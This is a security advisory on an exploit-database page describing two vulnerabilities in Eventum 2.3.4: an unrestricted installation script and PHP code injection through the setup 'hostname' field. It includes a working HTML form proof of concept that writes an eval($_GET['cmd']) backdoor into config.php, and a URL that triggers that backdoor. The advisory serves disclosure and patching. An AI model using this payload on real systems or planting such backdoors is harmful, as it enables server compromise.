0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Eventum 2.3.4 Incorrect Permissions / Code Injection Vulnerabilities
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
Vendor: Eventum Development Team Vulnerable Version(s): 2.3.4 and probably prior Tested Version: 2.3.4 Advisory Publication: January 22, 2014 [without technical details] Vendor Notification: January 22, 2014 Vendor Patch: January 24, 2014 Public Disclosure: January 27, 2014 Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94] CVE References: CVE-2014-1631, CVE-2014-1632 Risk Level: Critical CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application. 1) Incorrect Default Permissions in Eventum: CVE-2014-1631 The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application. The installation script can be access by a remote unauthenticated user via the following URL: http://[host]/setup/index.php 2) Code Injection in Eventum: CVE-2014-1632 The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server. The following exploitation example injects a backdoor into "/config/config.php" file: <form action="http://[host]/setup/index.php" method="post" name="main"> <input type="hidden" name="cat" value="install"> <input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('"> <input type="hidden" name="relative" value="/"> <input type="hidden" name="db_hostname" value="db_hostname"> <input type="hidden" name="db_name" value="db_name"> <input type="hidden" name="db_table_prefix" value="db_table_prefix"> <input type="hidden" name="drop_tables" value="yes"> <input type="hidden" name="db_username" value="db_username"> <input type="hidden" name="setup[smtp][from]" value="email@email.com"> <input type="hidden" name="setup[smtp][host]" value="localhost"> <input type="hidden" name="setup[smtp][port]" value="25"> <input type="hidden" name="" value=""> <input type="submit" id="btn"> </form> After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system: http://[host]/index.php?cmd=phpinfo%28%29; ----------------------------------------------------------------------------------------------- Solution: Update to Eventum 2.3.5 More Information: https://bugs.launchpad.net/eventum/+bug/1271499 Vendor disclosed vulnerabilities and authorized us to release advisory on public before our usual delay (3 weeks). ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum. [2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. # 0day.today [2024-11-16] #